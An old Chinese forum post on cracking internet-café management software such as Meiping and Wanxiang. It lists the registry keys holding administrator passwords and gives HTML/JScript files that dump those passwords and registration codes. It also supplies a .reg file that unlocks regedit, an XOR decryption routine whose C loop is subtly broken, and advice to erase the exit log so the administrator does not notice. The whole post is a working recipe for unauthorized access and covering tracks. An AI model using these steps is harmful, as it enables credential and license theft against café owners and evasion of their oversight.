|   
 UID2031431 威望27 点 金钱2 金币 点卡10 点 
 | 
1#
 发表于 2003-7-11 02:15 
 | 只看该作者 
 关于网吧破解
| 首先要对电脑编程有一定基础! 对于美萍,这时我们可以打开regedit,到
 HKEY_LOCAL_MACHINE\Software\Mpsoft\Smenu\中将会发现有
 "exitpassword","quitpassword","setuppassword"的键名,它们的键值便是密码信息,由此可以算出他们的共享密码(其它几种网管软件跟这个都类似,一般网吧为了好管理,密码全是一样的),如果注册表编辑器被锁,那么我们也可以自己编写程序来获得此密码信息与注册名和注册码或者编写解锁代码,方法如下,打开一个文本文档,在文本里边输入如下代码:
 方竹的是:
 <html>
 <head>
 <title>方竹的密码信息</title>
 </head>
 <body>
 <script language="javascript">
 WSHShell=new ActiveXObject("WScript.Shell");
 var a=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\jingzu\\jilu\\rewin");
 document.write("方竹的系统设置密码:");
 document.write(a);
 </script>
 </body>
 </html>
 万象的是:
 <html>
 <head>
 <title>万象幻境的密码信息</title>
 </head>
 <body>
 <script language=javascript>
 WSHShell=new ActiveXObject("WScript.Shell");
 var a=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\万象幻境\\专家系列网管软件\\运行设置程序密码");
 document.write("万象幻境的密码信息:");
 document.write(a);
 </script>
 </body>
 </html>
 美萍8.0以下版(包括8.0)的是:
 <html>
 <head>
 <title>"美萍8.0"的密码信息</title>
 </head>
 <body>
 <script language="Javascript">
 var WshShell = new ActiveXObject("WScript.Shell");
 var a=WSHShell.RegRead("HKEY_CURRENT_USER\\Software\\Mpsoft\\Smenu\\setuppassword");
 document.write("美萍8.0以下版(包括8.0)的密码信息:");
 document.write(a);
 </script>
 </body>
 </html>
 美萍8.1以上版(包括8.1)的是:
 <html>
 <head>
 <title>美萍8.1的密码信息</title>
 </head>
 <body>
 <script language=javascript>
 WSHShell=new ActiveXObject("WScript.Shell");
 var a=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\ Setup\\Ndis\\Psetup");
 document.write("美萍8.1以上版(包括8.1)的密码信息:");
 document.write(a);
 </script>
 </body>
 </html>
 万象幻境的注册码:
 <html>
 <head>
 <title>万象幻境的注册码</title>
 </head>
 <body>
 <script language=javascript>
 WSHShell=new ActiveXObject("WScript.Shell");
 var a=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\万象幻境\\专家系列网管软件注册信息\\序列号");
 var b=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\万象幻境\\专家系列网管软件注册信息\\注册码1");
 var c=WSHShell.RegRead("HKEY_LOCAL_MACHINE\\Software\\万象幻境\\专家系列网管软件注册信息\\注册码2");
 document.write("序列号:");
 document.write(a);
 document.write("注册码:");
 document.write(b);
 document.write(c);
 </script>
 </body>
 </html>
 然后另存为随便一个htm文件就可以了,保存后再打开它,那么我们所要的密码信息就会自动的出来了。
 控制面板和Regedit解锁代码:
 REGEDIT4
 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
 "DisableRegistryTools"=dword:00000000
 "NoDevMgrPage"=dword:00000000
 然后另存为随便一个reg文件,再把它导入注册表,重启机器即可生效。
 首先它的密文不区分大小写,因为大小写分别输入后密文并未发生改变,并且其采用的是ASCII代码调换加密法,且仅支持64个字符,对应值如下表所示:
 密码对照表(左边是键值,右边的是密码)
 032 sp  033 !  034 "  035 #  036 $  037 %  038 &  039 ’  040 (  041 )
 042 *  043 +  044 ,  045 -  046 .  047 /  048 0  049 1  050 2  051 3
 052 4  053 5  054 6  055 7  056 8  057 9  058 :  059 ;  060 <  061 =
 062 >  063 ?  064 @  091 [  092 \  093 ]  094 ^  095 _  096 '  097 a
 098 b  099 c  100 d  101 e  102 f  103 g  104 h  105 i  106 j  107 k
 108 l  109 m  110 n  111 o  112 p  113 q  114 r  115 s  116 t  117 u
 118 v  119 w  120 x  121 y  122 z  123 {  124 |  125 }  126 ~  127 Del
 
 这时可以使用switch语句,便能编写密文的还原程序,不过我认为此算法的加密与解密是同一方法。加密程序是"美"自带的,一定不会太麻烦,所以解密程序也用不着switch语句了,在"美"中只是将密码原文中的ASCII码二进制个别位的0变1,1变0。比如"a"为01100001加密后为00101000即"("左括号。所以用C语言编写这个破解程序的核心语句为:
 假设串a[255]为密文
 int i=0;
 while(a!=’\0’)
 {
 a^=0x49;
 i++;
 };
 我想加密程序也应该跟它差不多都是这样编写的。这时候"美"密码全面告破,我们便将掌握机器的最高权力,点"退出系统",在对话框中写入我们获得的密码,久违了的Windows桌面就这样又回来了。然后进入设置程序,将限制统统去掉!但是假如就只是这样,"网管"会发现我们的,因为"美"在退出时,会记录下"退出美萍安全卫士"的信息,所以当我们重新登陆后,就得把这条消息及时删掉。
 | 
 
| 哈哈哈!!!!你的IP是不是  ?我都知道了!!! |  |